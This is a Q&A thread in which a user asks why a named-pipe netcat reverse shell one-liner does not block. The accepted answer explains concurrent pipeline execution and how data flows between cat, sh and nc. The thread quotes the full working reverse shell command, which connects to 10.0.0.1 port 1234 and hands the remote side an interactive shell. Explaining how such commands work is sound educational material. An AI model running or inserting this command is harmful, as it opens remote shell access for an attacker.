# How does shell executes netcat, when blocked by named pipe?

Tags: bash, shell, pipe

I dont understand this reverse shell:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

As from my playing with `mkfifo` pipes, I know that when trying to wrie to pipe (e.i via `cat something | pipe`), it blocks until it is read somewhere (another tab). So it blocks. And shell executes from left to right. So how can `nc 10.0.0.1 1234`, command in the middle, connect, when the whole command `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f` is blocked by `cat /ymp/f`? Or does shell NOT executes from left to right?

Comment: **Processes in a _pipeline_ `a | b ...` execute concurrently** if the system has the resources to do so, which pretty much any built in the last 40 years does. So do those in background `a & b`. Commands seperated by `;` or newline execute in sequence (left to right for `;`, top to bottom for newline) and separated by `&&` or `||` in sequence but only if/while needed to determine the result.

Comment: if pipes execute concurrently, and also pipes changes/redirects stdout of first program and stdin of second program (the definition of pipe), then how can second program execute concurrently, when it did not received piped data to stdin? How can be concurrency achieved, when first program, the one providing data INTO piped executes LATER, then second program receiving data FROM pipe? It would receive no data at all, if the first program miss (executes later). How is the transfer of data carried on in concurrency?

Answer (score 3, accepted):

Meta: this is not programming or development, but (much) too long for comments. If closed or otherwise requested I agree to delete.

Your expanded-in-comment question seems to evidence a good deal of misunderstanding or ignorance, so I'll start at the beginning and be a *lot* more detailed.

**How a process works** in an OS like Unix (or pretty much any after S/360 OS/MVT in about 1970 and CP/M or MS-DOS -- or original MacOS -- a few years later):

1. the process is created with resources including an address space, which contains program code to run, readonly data, and read-write data that may be initialized or may default to zero; open files, typically stdin, stdout, and stderr (but this *can* vary); and some other inputs like command-line arguments and environment variables.
2. the process exists for some period of time; during at least some of this time it actually runs the program code. However it usually spends some time not running, either because (a) it is waiting for an I/O operation, or is otherwise prevented from running by an external condition such as 'job control' from the shell -- these are usually described as '[temporarily] not runnable' or (b) it is runnable but there is no CPU available at the moment -- in the old days this was common, since there was only one CPU and the OS would 'share' it across the runnable processes for brief 'time slices'; nowadays nearly all machines have at least multiple 'cores' that function as CPUs so multiple processes can truly run simultaneously. We loosely speak of the process as 'executing' as long as it exists even though it isn't actively running or even runnable all of that time.
3. the process ends because the program decides to or because something external forces it (like SIGKILL in Unix), and releases its resources; this is also described as 'exit[ing]', 'die/dying', or 'terminate/ing'.

**How a pipeline works** in Unix: the shell initially creates one process for each component of the pipeline, with files redirected as specified either explicitly by `< >` etc or by the pipeline (each component other than the last has its stdout linked to the next component's stdin by a new, unique unnamed pipe). All these processes begin executing at the beginning of their respective programs, but in nearly all cases that program execution will reach an I/O call and stop running temporarily until the I/O completes. When *all* of the processes in the pipeline exit/die/terminate, the shell considers the pipeline command completed.

**How your example works**: shell creates the three processes:

1. `cat` with argument /tmp/f and stdout to an unnamed pipe which I'll call pipe2 for clarity; because it was given a filename argument `cat` opens that file (which succeeds because of #3 below) and begins reading from it, which waits because there is no data in it.
2. `sh` with argument `-i` (making it 'interactive') and stdin from pipe2 and stdout to another pipe I'll call pipe3; since its I/O is not a terminal, `sh` doesn't output any prompt and starts by reading stdin for a command, which waits (temporarily stops running) because there is no data in pipe2
3. `nc` with arguments `10.0.0.1 1234`, stdin from pipe3, and stdout to /tmp/f (which being open for writing causes the open by `cat` in #1 to complete, but not the read)

`nc` now connects to the system specified by its arguments (address and port) and begins trying *simultaneously* to read from stdin and send to the remote and receive from the remote and write to stdout; this can be done either with threads or 'non-blocking' (multiplexed) I/O and I'm not bothering to read the source to find out which -- especially as there are many different versions of `nc` and I don't know which you have. The first part initially does nothing because pipe3 is empty, but the second part succeeds: the remote sends some data, for example let's say the line `steal_valuables`, which `nc` writes to /tmp/f.

This causes the read by `cat` to complete, so `cat` immediately writes that same data to pipe2 (and goes back to reading /tmp/f); this in turn causes the read by `sh` to complete, and it interprets the input as a command to be executed. For our example let's say `steal_valuables` simply outputs the line `as you command` to its stdout which is pipe3 (then `sh` goes back to reading pipe2). `nc` now reads the data available in pipe3 and sends it to the remote, and the attack step is complete.

Rinse and repeat until:

1. EITHER the remote closes the connection, which causes `nc` to close its stdout and exit (soon if not immediately); as a result `cat`'s read completes and returns EOF so `cat` exits closing pipe2, so `sh` similarly gets EOF and exits closing pipe3, and all done
2. OR the remote sends a command that causes `sh` to exit, closing pipe3, so `nc` closes the connection and exits, closing /tmp/f, cause `cat` to get EOF and exit, closing pipe2, ditto

Comment: I think this is a useful overview.  The critical bit is that it’s **each read** that blocks on the pipe (named or no), not something bigger like starting a process.